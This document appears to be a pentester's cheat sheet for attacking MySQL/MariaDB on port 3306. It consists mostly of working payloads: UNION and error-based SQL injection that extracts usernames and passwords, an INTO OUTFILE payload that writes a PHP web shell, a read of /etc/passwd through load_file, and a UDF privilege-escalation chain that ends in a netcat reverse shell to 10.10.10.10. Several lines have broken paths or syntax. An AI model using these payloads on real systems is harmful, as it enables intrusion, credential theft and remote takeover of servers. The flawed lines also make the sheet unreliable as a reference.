Port 3306 - MySQL/MariaDB

Connect:

mysql -h $IP -u$user -p$password

• Often remote entry is banned, nmap will tell you this

Config:

• /etc/my/cnf

Exploit:

• UDF to RCE (privesc usually

Version

select version();, select @@version();

User:

select user();

Generic UNION SQLi:

Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables

Union Select 1,2,3,4,column_name from information_schema.columns where table_name="user"

Insert Backdoor in PHP:

' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'var/www/html/cmd.php' -- -'

Generic Error-Based SQLi:

' AND (SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT username FROM users LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- -,

AND (SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT password FROM users LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- -

Read File:

select load_file('/etc/passwd');

UDF PrivEsc Exploit:

https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql

create table zys(line blob);
insert into zys values(load_file('tmp/sqlpe.so'));
select * from zys into dumpfile '/usr'lib/mysql/plugin/sqlpe.so';
create function sys_exec returns integer soname 'sqlpe.so';
select sys_exec('nc -nv 10.10.10.10 20 -e /bin/bash');